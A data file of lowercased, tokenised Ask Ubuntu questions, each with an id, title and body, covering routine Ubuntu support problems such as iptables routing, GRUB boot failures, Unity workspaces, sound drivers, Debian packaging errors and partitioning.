34486	the problem of virtual lan and iptables 's configuration	i added the virtual lan eth0:3 in /etc/network/interfaces ifconfig eth0 link encap : ethernet hwaddr:00:1e : ec:11:97 : dc inet address:10.16.31.179 broadcast:10.16.31.255 netmask:255.255.255.0 eth0:3 link encap : ethernet hwaddr:00:1e : ec:11:97 : dc inet address:192.168.55.1 broadcast:192.168.55.255 netmask:255.255.255.0 the rules in iptables : filter : chain input ( policy accept ) target prot opt source destination accept all -- 192.168.55.0/24 anywhere chain forward ( policy accept ) target prot opt source destination accept all -- 192.168.55.0/24 anywhere chain output ( policy accept ) target prot opt source destination rules in nat table to connect to eth0 : chain prerouting ( policy accept ) target prot opt source destination chain postrouting ( policy accept ) target prot opt source destination masquerade all -- 192.168.55.0/24 anywhere chain output ( policy accept ) target prot opt source destination ip route show 192.168.55.0/24 dev eth0 proto kernel scope link src 192.168.55.1 192.168.56.0/24 dev vboxnet0 proto kernel scope link src 192.168.56.102 10.16.31.0/24 dev eth0 proto kernel scope link src 10.16.31.179 default via 10.16.31.1 dev eth0 default via 10.16.31.1 dev eth0 metric 100 but why the client with address '192.168.55.111 ' can ping my computer ( sometimes lost a little packets ) , but i ca n't ping the '192.168.55.111 ' ? ( the client firewall had been closed ) . hope for any answer . thanks !
34490	what are the differences between gconf and dconf ?	i 've read a lot of discussion about a new ubuntu configuration tool : gconf is replaced by dconf . why is this change being made ? why is there so much debate about it ? is it too difficult to create a gconf2dconf migration tool ?
34491	will there be some kind of widgets for unity ?	will there be some kind of widgets for unity ? somethign like kde has already ?
34492	captive portal vpn	i 'm sitting in a pub which promises wifi but in fact only seems to allow http and https over their standard ports , so no github , and no connecting to my home machine over ssh . how can i bypass all this sort of stupidity for good ? i have a machine at home which i can leave running all the time . both my laptop and my home machine are ubuntu boxes . i 'm thinking , http server on home machine , program on laptop catching all attempts to contact the network , encrypting them , and forwarding over http to the home machine , which then goes and does its thing over its clear internet connection , and sends the results back . then wherever i can get http over port 80 to home , i have proper access . is there an easy way to do it ? does that easy way have a simple page of documentation in the form of 'this is what you type on your laptop ' , 'this is what you type on your home machine ' . if not , what 's the least hard way , and where are the clues ?
34493	error message in update manager	i am getting an error message when i run the update manager : e : malformed line 59 in source list /etc/apt/sources.list ( dist parse ) any ideas on how to resolve this issue ?
34495	getting wacom bamboo pen + touch pressure sensitivy in gimp	i 've installed my wacom bamboo pen + touch ( cth-460 ) in ubuntu ( at least on one system , not another ) and the pen works well for controlling the mouse cursor . however , i ca n't get pressure sensitivity to work in gimp . i have 4 extra devices in the input devices settings screen now , two of which are the pen and eraser . i 've set them both from disabled to screen , and left the default settings intact . however , after saving i still do n't see any pressure options in the brush tool 's options . i 've also tried setting the mode to window instead , but it makes no difference regarding pressure sensitivity . there are no other modes . the pressure works out-of-the-box in blender ( grease pen ) so it must be something in gimp . what can be wrong ? why do n't the options appear ? how can i debug this ?
34503	wo n't recognize external sound card after latest update	i 'm running ubuntu 10.04 . until yesterday , my audiophile sound card was working beautifully . i ran the latest update , and now it does n't show up under sound preferences . ( when i plugged in a usb headset , that appeared under sound preferences and worked just fine . ) the sound card is listed under aplay -l. **** list of playback hardware devices **** card 0 : audiophile192 [ m audio audiophile192 ] , device 0 : ice1724 [ ice1724 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : audiophile192 [ m audio audiophile192 ] , device 1 : ice1724 iec958 [ ice1724 iec958 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : intel [ hda intel ] , device 0 : alc888 analog [ alc888 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : hdmi [ hda ati hdmi ] , device 3 : ati hdmi [ ati hdmi ] subdevices : 1/1 subdevice # 0 : subdevice # 0 the sound card is listed under lspci | grep -i audio , as envy24 ( i 'm not sure why it 's called envy24 here instead of audiophile , but that 's always been the case . ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 02 ) 01:00.1 audio device : ati technologies inc rv710/730 02:00.0 multimedia audio controller : via technologies inc. vt1720/24 [ envy24pt/ht ] pci multi-channel audio controller ( rev 01 ) here 's the alsa information : view the sound card is listed as : ! ! soundcards recognised by alsa ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 0 [ audiophile192 ] : ice1724 - m audio audiophile192 m audio audiophile192 at 0xdf00 , irq 2 if i run alsamixer from the terminal , the correct audiophile sound card is the one shown . i 'm not sure what to do next . thanks very much for any help/suggestions .
34505	some appilications auto start itself repeatedly after login	every time i start my kubuntu system ( 10.10 ) after i login it starts up several instances of certain applications ( first it was terminal , now it is krusader ) and increase the number of instances with each login ( now it starts more than 15~ times ) .. i have looked at system settings - > startup and shutdown section , but i have n't found anything in there . how can i fix this problem ?
34506	boot problem after upgrade from 9.10 to 10.04	i just did system upgrade form 9.10 to 10.04 using alternate cd described here : https : //help.ubuntu.com/community/lucidupgrades # upgrading % 20using % 20the % 20alternate % 20cd/dvd - i did it this way because i have limited internet access and i ca n't afford to do it by downloading all packages from repositories . and btw . this method is using default ubuntu distribution upgrade application . after reboot , grub and white ubuntu logo on black screen , boot process stops on blank screen . when i try run system in recovery mode i have this message : init : plymouth main process ( 449 ) killed by segv signal this bug is known , but i have not found solution : https : //bugs.launchpad.net/ubuntu/+source/plymouth/+bug/571258 i have also tried removing `` quiet splash '' from boot parameters , but it does n't helped at all . but i received additional info : `` mountall : disconnected from plymouth '' prior to this error . any idea how to fix boot process so i can use system ? thanks , damian .
34509	grub2 deadlock situation	during 10.04 starts it does a filesystem check . for some reason that i want to figure out , but this is another question , the harddisk is mounted read only . i would like to boot to a rescue shell , but the grub2 menu is hidden i can not change the grub default config , because i have read only access to the harddisk . i will now try and manually mount the harddsik readable to change the grub option . is there a secret key combination to : show the grub menu anyway during boot ? make the splash go away during boot and see the interesting console output ? edit : the answer is to hold the shift key , after the grub message `` starting grub '' appears . this is also a good article about understanding grub2 or switching form grub to grub2 : http : //maketecheasier.com/mastering-grub-2-the-easy-way/2009/11/19
34515	how to fix ahead disk mounting / ahead of time problem	i am booting a 32 bit laptop with ubuntu 10.04 . i see only a splash screen during boot , in the end theer is a message that the main filesystem is mounted read only ( there is only one harddisk ) . i could grasp a message saying that the last check time of the harddisk is in the future . the message also told me the time that was set there . but the message disappearde to quickly and i can not bring it back . i checked cmos time , but it is set to utc and correct . ( could it be that somehow my local time and utc was not applied correctly ? ) where can i see the messages from boot ? i can not see them on the secreen because there is only an ubuntu logo while it should display interesting messages ( see also grub2 deadlock situation where i am asking how to change the boot process ) dmesg does not show any of the harddsik problems at all /var/log/boot is empty ( i did not enable bootlogd yet , see http : //ubuntuforums.org/showthread.php ? t=49925 )
34519	how to disable cryptswap ?	how can i disable cryptswap ? i would like an unencrypted swap like before . this is on an ubuntu 9.10 system .
34520	sleep command not working with start up applications	i am trying to add a delay at start up for a few applications using the sleep command . for example : i 'm trying sleep 5 ; tomboy which works in terminal , but does n't work when i add it to the command field in the `` startup applications '' section of the system settings . with the sleep command , the commands do n't seem to execute at all . is there another command i should be using to create a delay ? is this a bug ?
34525	apply a view to every folder in evolution	how can i make evolution display every folder the same way , with the same columns and -widths and no preview field ?
34527	what happened to the icons in my tray area ?	after i installed ubuntu , i removed the top panel where all of the notifications and applet are since i was used to windows . can anyone tell me how to get all of those tray icons like the internet icon on my lower screen bar back ?
34529	how well does an ati mobility radeon hd 5650 work ?	getting a new laptop soon with the ati mobility radeon hd 5650 , and just wondering if the card will be supported ( unofficially or oficially is all the same ) by unity in natty ?
34530	executing a super-user command through .bashrc	is it possible to execute a super-user command in .bashrc ? and if so , how ? it would save me having to execute `` sudo /opt/lampp/lampp start '' on each startup . i 've considered using the lamp stack from the repositories , but it does n't really meet my needs ( i need to be able to move the entire lamp stack folder ) . thanks in advance .
34532	ubuntu kiosk - delay loading browser/gnome until custom application fully loads	i 've got a ubuntu kiosk that on boot loads up a local web app in firefox . i 'm booting gnome and firefox too quickly . we need to wait about 30 seconds after it loads up and then need to hit refresh on the browser for the application to load properly . what 's the best way to slow this down a bit . ideally i 'd like it to come up after we get a 200 success code from apache . should i have a shell script that does n't return true until it gets a 200 ? or maybe for now a script that does a sleep 60 before gnome loads ? where 's the best place to put a script to slow down gnome/firefox bootup ?
34536	using up arrow to run previous command	what setup do i need to use up-arrow to run previous command ? with mac , i can use up-arrow to rerun the command that i just run , but it does n't seem to work with my bash shell . i use 8.04 ( i ca n't use the newest distribution because of some compiler version issues ) . added i did n't change anything as it 's a fresh install with vmware fusion on mac .
34543	schedule a theme change using cron	i am trying to figure out how to automatically switch to the equinox evolution dawn , light , dusk , and midnight theme at the appropriate time of day ( ie ; at 6 a.m. it would switch from midnight to dawn , at 8 or 9 it would switch to light , 7 p.m. would switch to dusk and 10 p.m. switch to midnight ) i am trying to do this using cron , with the following crontab : 0 6 * * * gconftool-2 -- type=string -- set /apps/metacity/general/theme 'equinox-evolution-dawn' 0 8 * * * gconftool-2 -- type=string -- set /apps/metacity/general/theme 'equinox-evolution-light' 0 19 * * * gconftool-2 -- type=string -- set /apps/metacity/general/theme 'equinox-evolution-dusk' 0 22 * * * gconftool-2 -- type=string -- set /apps/metacity/general/theme 'equinox-evolution-midnight' this is not working . i am using ubuntu 10.10 with compiz as window manager
34544	how do i use my laptop as a screen for ps3 ?	i have a asus m51tr laptop with ati mobility radeon hd 3400 series graphic card . i 've installed ubuntu 10.10 and privative controllers . i want to use the hdmi port to play ps3 as if the laptop was a screen . note : i do n't want any kind of ps3 emulator or that sort of things . thank you .
34546	ca n't get usbmon to work	i 'm trying to use usbmon but modprobe usbmon does not work . the error is fatal : module usbmon not found i 'm using kernel version 2.6.31-23-generic-pae do i need to recompile the kernel ? is there another way to monitor usb traffic ? also is there a known bug in usb driver ? at the app level i at times fail to receive a packet . i am using libusb 1.0 and it 's not reporting any errors .
34550	what do i have to do before giving away my ubuntu machine ?	i have an old laptop that is running ubuntu . now i want to give away this laptop , but i want to remove all private data . so what should i remove ? i do n't want to format the whole system , because the os will be still in use by the new owner .
34556	nautilus `` locks up '' when browsing directories with version control , many files	when opening a directory that is version controlled , especially one with subdirectories containing hundreds or thousands of individual files , nautilus temporarily freezes ( application does not respond to user input ) . a similar behavior applies to directories with hundreds or thousands of individual files . these freezes can last several minutes , during which cpu load barely climbs ( 2 - 4 % above normal ) but hard disk access is significant . an example is a version controlled directory , with the complete boost library source and gnu science library source , both untarred , and the entire source tree of a hydrology model . is there a way to reduce or eliminate this problem ? ( version control is critical and ca n't be altered ; some file re-organization can be done for badly affected directories ) note : this affects both 10.04 lts ( 32-bit pae ) and 10.10 ( 64-bit ) . the lucid machine has a core i7 ( 2.8ghz ) , 6gb ram , and 1tb hdd with a 32mb cache . the maverick machine has a core i5 ( 2.43ghz ) , 4gb ram , and a 500gb hdd ( unknown cache size ) . both hdds are 7200 rpm drives .
34557	permanently set process limit	how do you permanently set process limit per user ( ulimit -u ) in ubuntu ?
34562	how to update ubuntu from windows in a dual boot setup without booting into it	is it possible to update ubuntu in a dual boot setup with windows 7 , without booting into ubuntu ?
34565	how well does the macbook air work with ubuntu ?	i 'm thinking of getting a nice laptop [ thin like macbook air , actually i 'm thinking of getting macbook air itself ] . question is , how well it will go with ubuntu . being ubuntu user for last 7 years , i cant think of moving away just for great hardware capabilities in airbook . however , it would be great if ubuntu 11.04 runs on airbook smoothly without much of messy . i would wish to have all ubuntu 11.04 features to work with macbook air . [ video/audio , keyboard , touchpad , etc ] . is there users out here tried and would recommend macbook air ? . any good guide would help as well .
34566	is there any media player that can playback mss2-encoded videos ?	i have a video that is encoded with microsoft 's windows media screen encoder ( the fourcc for the video codec is mss2 ) . is there anything on ubuntu that will play this format ?
34569	totem issue with youtube : gstreamer	when trying to play youtube videos in totem , i get this error : gstreamer encountered a general supporting library error . when starting from the commandline , the actual error is is this : message error : gstreamer encountered a general supporting library error . gstffmpegdemux.c ( 1255 ) : gst_ffmpegdemux_open ( ) : /gstplaybin2 : play/gsturidecodebin : uridecodebin1/gstdecodebin2 : decodebin21/ffdemux_swf : ffdemux_swf1 : `` input/output error '' there are several threads floating around other sites for this problem in 9.xx , but i 'm on 10.10 , and supposing the proposed updates are long propagated . i have checked and the gstreamer ffmpeg plugin is installed : everything is basically stock .
34570	how can i share my iphone 's 3g connection with my ubuntu 10.10 desktop pc ? currently using mywi app	i 'm trying to share my iphone 's 3g data connection with my ubuntu desktop as my broadband router has blown up ( a new one is on order ... ) . i have successfully managed to share my 3g data connection with my win 7 os on the same desktop machine , but i 'd really like to get it working in ubuntu , as win 7 is a real step back for me . on win 7 i was able to share my mobile data connection by installing the ios mywi app on my iphone and connecting over usb . i tried to share my 3g connection via usb and use the native ios 'internet tethering ' feature but win 7 could not discover the connection . on ubuntu i 've tried using the mywi app to share my 3g connection to my ubuntu desktop via usb but ubuntu simply can not 'discover ' the network . i also tried to set my iphone to 'internet tethering on ' and manually adding my mobile connection in ubuntu as a 'mobile broadband ' and adding the apn for 3uk . i could n't get ubuntu to discover the network . any ideas please ? my iphone is 4.01 ( jailbroken ) ubuntu 10.10 ( fully up to date so i should n't need to install any new iphone packages , i thought ) mywi app v4.60.14 data provider is 3 mobile ( uk ) . i have an unlimited data plan .
34572	how can i reduce or increase the number of workspaces in unity ?	i was reading about how to get multiple workspaces in the mutter version of unity , however since compiz is replacing mutter how do i go about adding and removing workspaces in compiz version of unity ?
34573	sound is played in a loop without mouse or keyboard activity	i have a weird problem with my linux . if i run a mp3-file with the rhythm box or also run a video in youtube that results in that if i do not move my mouse or touch the keyboard for about 3 seconds , the sound is played in a loop ( the 2 last seconds keep repeating ) . ( in the case of youtube also the video stops in the meanwhile ) after touching the keyboard/mouse it repeats until nothing is pressed for around 3 seconds again ! somebody knows this problem or a solution ? my distribution is ubuntu 10.10 which uses pulseaudio . i can kill it , but just by restarting it i get the same problem , do i need a different driver ?
34575	path not setting up for a setup	i am unable to add path of my omnet bin directory for the installation . during the installation i go to the omnet directory and enter ./configure which gives me the following errors warning : your path does n't contain /home/abc/desktop/omnetpp-4.1/bin ! add the following line to your .profile or .bash_profile ( provided you use bash ) : export path= $ path : /home/abc/desktop/omnetpp-4.1/bin warning : the tcl_library environment variable is not set , and without it tkenv ( the gui runtime environment ) may be unable to find the blt library . add the following line to your .profile or .bash_profile ( provided you use bash ) : export tcl_library=/usr/share/tcltk/tcl8.4 so i do the exact thing ... go to the profile file ~/.profile and it now looks like this # if running bash if [ -n `` $ bash_version '' ] ; then # include .bashrc if it exists if [ -f `` $ home/.bashrc '' ] ; then . `` $ home/.bashrc '' fi fi # set path so it includes user 's private bin if it exists export path= $ path : /home/abc/desktop/omnetpp-4.1/bin if [ -d `` $ home/bin '' ] ; then path= '' $ home/bin : $ path '' export tcl_library=/usr/share/tcltk/tcl8.4 fi but still the error persists . what am i doing wrong ? ?
34579	how do i know if my video card can run unity ?	i have an old laptop which has some 3d graphics support , how do i know if this will be enough for unity to run ?
34588	how do i enable the 3d cube so i can use it in unity ?	i 'm looking to get the `` 3d cube '' in ubuntu 11.04 beta 1 , however last time i tried it after using compiz i lost my desktop and hand to reinstall . however i have read this bug which seems to state this is fixed , however when i go to disable the wall to enable the cube it still seems like its going to break it ( i dont want to try it again as it may break my desktop again : - ) ) anyone able to shed any light on how i go about this ?
34590	creating .deb with javahelper	i have already lost the full day trying to figure out what i 'm doing bad . i ca n't package my java application into .deb package . the steps i 'm doing are : 1 ) copy the src files into folder with name : something-1.2 2 ) run jh_makepkg in the directory where something-1.2 is situated 3 ) in something-1.2/debian/ : edit rules file ( only adding classpath ) edit control file adding version and homepage edit something.install adding some more files to be copied edit something.manifest editing main-class 4 ) i run dpkg-buildpackage -d inside the something-1.2 folder and i got an error : dpkg-buildpackage -d dpkg-buildpackage : set cflags to default value : -g -o2 dpkg-buildpackage : set cppflags to default value : dpkg-buildpackage : set ldflags to default value : -wl , -bsymbolic-functions dpkg-buildpackage : set fflags to default value : -g -o2 dpkg-buildpackage : set cxxflags to default value : -g -o2 dpkg-buildpackage : source package something dpkg-buildpackage : source version 1.2-1 dpkg-buildpackage : source changed by < some1 @ example.com > dpkg-buildpackage : host architecture i386 debian/rules clean dh -- with javahelper clean dh_testdir dh_auto_clean dh_clean jh_clean dpkg-source -b something-1.2 dpkg-source : warning : unknown information field 'version ' in input data in general section of control info file dpkg-source : info : using source format `1.0' dpkg-source : info : building something in something_1.2-1.tar.gz dpkg-source : info : building something in something_1.2-1.dsc debian/rules build dh -- with javahelper build dh_testdir dh_auto_configure dh_auto_build jh_build find src -name *.java -and -type f -print0 | xargs -0 /usr/lib/jvm/java-6-openjdk/bin/javac -cp /home/lib/jdom.jar : /home/lib/mysql-connector-java-5.1.6-bin.jar : debian/_jh_build.something -d debian/_jh_build.something fastjar -c -f /home/user/fp/something-1.2/something.jar -m ../_jh_manifest.something probe dh_auto_test debian/rules binary dh -- with javahelper binary dh_testroot dh_prep dh_installdirs dh_auto_install dh_install dh_installdocs dh_installchangelogs dh_installexamples dh_installman dh_installcatalogs dh_installcron dh_installdebconf dh_installcatalogs dh_installemacsen dh_installifupdown dh_installinfo dh_installinit dh_installmenu dh_installmime dh_installmodules dh_installlogcheck dh_installlogrotate dh_installpam dh_installppp dh_installudev dh_installwm dh_installxfonts dh_bugfiles dh_lintian dh_gconf dh_icons dh_perl dh_pysupport dh_usrlocal dh_link jh_installlibs jh_classpath jh_manifest jh_exec jh_depends make : *** [ binary ] error 1 dpkg-buildpackage : error : debian/rules binary gave error exit status 2 any idea of what i 'm doing wrong ? any suggestions ? thanks in advance .
34592	how to clear recently used files without using a terminal ?	how can i clear the recently used and viewed files in ubuntu 11.04 without using terminal ?
34596	change keyboard layout in wine ?	i 've got some games running in wine , but i ca n't figure out how to change the keyboard layout . by default , i use the dvorak layout in ubuntu , which is n't very friendly for most games . i can change it back to qwerty in ubuntu , but when i fire up a game , it stays with my default dvorak . how can i change to qwerty inside my wine application ?
34597	how do i make a custom launcher for terminal applications ?	i have some command line applications ( and remote servers ) that i want to make individual launchers for on the unity launcher , how do i do that ?
34605	how does the ubuntu upgrade process work ?	how does ubuntu upgrade seamlessly to a newer distribution , while the operating system is still running ? i 'm upgrading from 10.10 to 11.04 , and i 've upgraded several times before , and it 's as simple as running update-manager -d and downloading and installing them , then rebooting . how exactly does this work though ? how is the upgrade manager able to update the operating system while it is still in use ?
34609	export wifi certificates	i use ubuntu in my laptop . i also have a nokia n8 phone . to connect n8 to `` wpa2 enterprise wifi '' , i need to export some certificate from my laptop . the page http : //www.youtube.com/all_comments ? v=b-2d1qr8c2c explains how to export the necessary certificate from windows 7 . can you please explain how to export the certificate from ubuntu ? simply copying the file in /usr/share/ca-certificates/mozilla does not work .
34610	redefined ctrl key : can i obtain multiple strokes by holding ?	i have redefined my right ctrl key to delete , using xmodmap -e `` keycode 105 = delete '' and this works very nicely , except that whenever i hold the key , it deletes only once . of course , i can highlight a sentence and delete it all with one press , but it would be very nice to be able to hold the key down , and have it continuously delete ( as the the normal del key does ) . can this be done ?
34616	how to restore installed packages from backup	i keep /home , /etc , and /usr/local backed up . my hard drive crashed and i reinstalled ubuntu and copied over my backed-up directories . ( yay for backups ! ) i assumed that something in /etc would tell the package manager what i want to have installed . apparently it does n't work that way . i would like to re-install all the packages that i had previously installed . is there something in my backed-up files that would tell me what i had installed ?
34619	what does upgrading modify ?	does upgrading leave all of my applications and personal information untouched ?
34620	how to run a custom set of programs in a specific workspace ?	i use several workspaces in order to have different context for different works . therefore , i run the same set of applications in the same workspace repeatedly . and also i run the same application in each set of applications , so setting the default workspace where each application should run does n't work for this purpose . for instance : workspace1 : 1 terminal + 2 tabs opened in chrome + a document opened with pdf viewer workspace2 : 3 terminals + 4 tabs opened in chrome + 1 tab opened in firefox + eclipse so , is there any way to have a script or something like set_workspace1.sh that once run open all the desired programs in a specific workspace ? btw , i 'm running 11.04
34624	ubuntu reinstall without moving home folders around	i recently got my ubuntu broken after upgrading to natty beta . even if i restore it , i want a full reinstall once it gets released ... i feel it 's needed clean up my previous issues ( including missing decorations and the broken natty ) ... windows habits , maybe : -p the question is , i got no free space for backups . i got 50gb for ubuntu , plus 200gb for windows splitted in three partitions , all packed full . is there a way to do a clean reinstall without recreating the partition or backing up all the data elsewhere ? i do n't care about config files , just users home folder contents . thanks !
34629	ubuntu on samsung 9 series thin laptop	has anyone tried loading ubuntu 11.04/10.10 on new samsung series 9 ( np900x3a ) . it looks pretty thinner and similar to macbook air . does it has good support with ubuntu ? .
34633	which software is available to connect to and manage cell phones ?	is there any application that can connect to my nokia 2700c phone and check my messages , applications , files , etc ? is there some application available in ubuntu like the nokia pc suite , for windows ? i saw some applications like kmobiletools in software center but nothing is working .
34635	my facebook does n't work on ubuntu 10.10 but works on windows xp	i have both operating systems installed on my pc , but facebook only works on xp . i have tried firefox and chromium , but it works the first time , but after i log in it does n't work , and can only open the main window again after i clean up the cache . any ideas ?
34636	computer not hibernating despite free swap	i am on acer 5742g . here are some specs processor : intel core i5-460m mobile processor ( 3mb intel smart cache , 2.53ghz ) chipset : mobile intel hm55 express memory : up to 3gb ddr3 sdram storage : up to 500gb sata hard drive , 5400rpm video : nvidia geforce 420m graphics i have 3.3gb of swap partition and 2.3gb of ram . but whenever i try to hibernate it says `` not enough free swap '' . here is the output of free command total used free shared buffers cached mem : 2319 1304 1014 0 453 544 -/+ buffers/cache : 306 2012 swap : 3344 0 3344 so you see there is lots of free swap space . then why is it not hibernating ?
34638	how do i install windows 7 without overwriting grub ?	i have both windows xp and ubuntu 10.10 in my pc , now as all know my windows xp is been attacked by virus , and i need to re-install it by windows 7 ( the reason is not for virus , i need a 64-bit os ) . now i have to do this , but grub should n't be crashed by the installation of windows 7 , any ideas ?
34639	bluetooth activation problem on acer 5742g	i have an acer 5742g laptop which has a bluetooth inbuilt ( i have used it in windows ) . the problem is the company has given only one button to activate wifi and bluetooth ( fn+f3 ) . in windows you press it once and a dialog box shows up with options to enable bluetooth or wifi . but in ubuntu nothing of that sort happens and it just toggles the wifi . what do i do to start my bluetooth .
34644	make `` compact view '' as a default directory view instead of `` icon view ''	how can i make `` compact view '' as a default for all directory view instead of `` icon view '' ?
34650	subprocess installed post-installation script returned error exit status 2	i 'm getting following error every time when starts to upgrade kubuntu please suggest some solution : : : : : : reading package lists ... building dependency tree ... reading state information ... the following packages will be upgraded : dhcp3-client dhcp3-common libavcodec-extra-52 libavutil-extra-50 libnss3-1d libservlet2.5-java libsmbclient libsvn1 libtiff4 libwbclient0 python-cupshelpers python-gnomekeyring samba-common samba-common-bin skype smbclient system-config-printer-common system-config-printer-udev update-manager-core update-manager-kde w3m x11-xserver-utils 22 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 3 not fully installed or removed . need to get 0b/54.9mb of archives . after this operation , 3,248kb of additional disk space will be used . do you want to continue [ y/n ] ? setting up tzdata ( 2011e-0ubuntu0.10.10 ) ... ca n't locate tie/hash.pm in @ inc ( @ inc contains : /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl . ) at /usr/lib/perl/5.10/posix.pm line 64 . begin failed -- compilation aborted at /usr/lib/perl/5.10/posix.pm line 64 . compilation failed in require at /usr/share/perl5/debconf/template.pm line 7 . begin failed -- compilation aborted at /usr/share/perl5/debconf/template.pm line 7 . compilation failed in require at /usr/share/perl5/debconf/question.pm line 8 . begin failed -- compilation aborted at /usr/share/perl5/debconf/question.pm line 8 . compilation failed in require at /usr/share/perl5/debconf/config.pm line 7 . begin failed -- compilation aborted at /usr/share/perl5/debconf/config.pm line 7 . compilation failed in require at /usr/share/perl5/debconf/log.pm line 10 . compilation failed in require at /usr/share/perl5/debconf/db.pm line 7 . begin failed -- compilation aborted at /usr/share/perl5/debconf/db.pm line 7 . compilation failed in require at /usr/share/debconf/frontend line 6 . begin failed -- compilation aborted at /usr/share/debconf/frontend line 6. dpkg : error processing tzdata ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : tzdata
34654	xbacklight can only decrease brightness	i 'm running ubuntu 10.10 on a cr48 . i 'm attempting to bind xbacklight -dec 10 to f6 ( decrease brightness in chrome os ) and xbacklight -inc 10 to f7 ( increase brightness in chrome os ) . the decrease command works fine , but the increase command appears to have no effect . it 's the same whether i run the command from the command line or use the bindings i set in compizconfig settings manager .
34657	how to make x.org listen to remote connections on port 6000 ?	this is on ubuntu 10.10 ( maverick meerkat ) 64-bit desktop . i want to make my x server listen to remote connections from clients in other machines on the local network . i know about ssh -x and that is not what i want . i vaguely remember changing something like tcplisten from no to yes , but i do n't remember where this change should be applied . i 'm interested in either a gui method or a cli one . ps editing /etc/x11/xinit/xserverrc to remove the -nolisten tcp option and rebooting does not work .
34658	how do i type a backtick in rubymine with a swedish keyboard layout ?	i am currently saddled with a swedish keyboard at work ( tmalss : i left my nice japanese one at home ) , which has some deadkeys , one of which is backtick . i can type a backtick just fine in any application save rubymine ( and probably any stupid jvm app ) either by pressing s-backtick s-backtick ( i.e . pressing backtick twice whilst holding down shift ) , or by pressing s-backtick space . any clues what could be going on here ? it almost certainly has to be java , but i do n't know anything about adjusting java input settings or whatever .
34659	thunderbird or evolution ?	before i upgraded from 10.04 to 10.10 ( i formatted my harddisk and installed it ) , i used thunderbird . now i wanted to test out evolution . i think it 's pretty good , because there are integrated notifications and encryption methods . another thing is that there 's a calendar integrated in evolution , but i can also install a calendar addon for thunderbird . what do you think about it ? can you tell me the pros and cons of thunderbird and evolution ? i do n't know which program i should use . i never used evolution before 10.10 , i always installed thunderbird . should i move to evolution , or stay with thunderbird ? i like both of them , i just need some pros and cons . if you think both email programs are bad , tell me a better one .
34666	what happened to /etc/apt/apt.conf ?	i was browsing through the apt folder to try my proxy settings and i was unable to find the apt.conf file in ubuntu 11.04 . is there any alternative file for it ? adding proxy settings to 99-synaptic in apt.conf.d does not help as it gets overwritten everytime i restart the system .
34669	latest kernel installed , but not running	i have a server , the current running kernel is 2.6.32-26-server , but i also have the following versions installed ( installed through doing aptitude full-upgrade , but not rebooted ) : linux-image-2.6.32-25-server linux-image-2.6.32-26-server linux-image-2.6.32-27-server linux-image-2.6.32-30-server i 'd ideally like the server to running on 2.6.32-30-server , but i 'm not sure how to get it to boot into that version . the menu.lst file has this entry as the first . title ubuntu 10.04.2 lts , kernel 2.6.32-30-server uuid e1a13f41-eb75-4ebe-aa30-a1699ea7523b kernel /vmlinuz-2.6.32-30-server root=uuid=4d012511-0277-4747-8eda-e3734fbb91d4 ro quiet splash initrd /initrd.img-2.6.32-30-server how can i set the kernel to boot from ? thanks
34670	how do i add classical categories in unity 's dash ?	i want to use the classical gnome categories ( accessories , education , games , office , sound and video ) in the dash menu instead of the current media apps | internet apps | more apps
34671	getting completion feature with alt+f2 in unity ?	i know there is an application that does what i want . it 's called gmrun but i was wondering if i could get something like bash completion with unity 's run interface .i.e . with tab command ?
34673	how to fix `` no previous changelog '' failure in launchpad 's ppa auto-builds ?	so i want to start using launchpad to push some packages . i use github to upload my code to , and i have noticed that there is an option to upload/import from a git repository ( that is what i did ) . it worked fine . however , when i tried to build the packages they fail with the following error : building recipe : # bzr-builder format 0.3 deb-version bugzilla4- { time } lp : bugzilla4 you have not informed bzr of your launchpad id , and you must do this to write to launchpad or access private data . see `` bzr help launchpad-login '' . i am not sure what i should do . possible problem : the recipe i wrote does not work i need to use bzr instead of git other please tell me what is the problem and how do i solve it ? one of the many logs can be seen here .
34678	unity 3d versus gnome shell	which one is better ? which one is efficient ? which one is mature ? which one is hotter ? who has compared both for pros and cons ?
34682	possible to memorize what are open before an application exits ?	i have these situations often , especially with the following applications : in nautilus : sometimes , i have opened several tabs each of which opened a different directory . but nautilus sometimes crashes , perhaps because it is running too long or there are too many tabs it can handle ? i was wondering if it is possible to memorize what directories are open in nautilus before it exits unexpectedly and when i feel this is desired , just like what the session manager in firefox does ? for document viewers , such as evince document viewer 2.32.0 and djvulibre djview 4.5 : i was also wondering if it is possible to memorize what files are open currently , before i have to reboot my os but do n't want to lose track of what i am now reading ? similar question for gedit . if there are/will be some solutions , are they application-specific , or in some cases can they be made application independent ? my os is ubuntu 10.10 thanks and regards !
34687	is there a text mode browser which support javascript ?	i need to configure my router remotely , and links etc wo n't work because the router config page uses javascript and refuses to run without it . obviously , shame on netgear for being this crap , but is there a text mode browser that will allow their abortion to run ?
34688	how to create a new partition from the existing partition ?	i wan na create a new partition from the existing root partition.my root partition is about 250gb.i wan na create a new partition say 150 gb taking space from this root partition.can anyone help me with the procedure on doing this ? output : fdisk -l karthick @ karthick : ~ $ sudo fdisk -l [ sudo ] password for karthick : disk /dev/sda : 250.0 gb , 250000000000 bytes 255 heads , 63 sectors/track , 30394 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x28219744 device boot start end blocks id system /dev/sda1 * 1 61 487424 83 linux partition 1 does not end on cylinder boundary . /dev/sda2 61 30395 243650561 5 extended /dev/sda5 61 124 498688 82 linux swap / solaris /dev/sda6 124 186 498688 82 linux swap / solaris /dev/sda7 186 30395 242651136 83 linux
34695	why is n't the configuration to make kde apps look native default ?	why is n't the configuration to make kde apps look native present in the default setup ?
34696	recovering a faulty disk	when i plug in a removable 1tb usb disk in my laptop , the operations led keeps blinking for a while and then you can hear the servo mechanism resetting with a short `` tack '' . i 'd like to recover the data . i believe there might be some way to get the data through low level ios . what i believe is that the mounting process assumes the disk is ok and i should prevent this before using ddrescue or something similar . does anybody have a solution to this problem ?
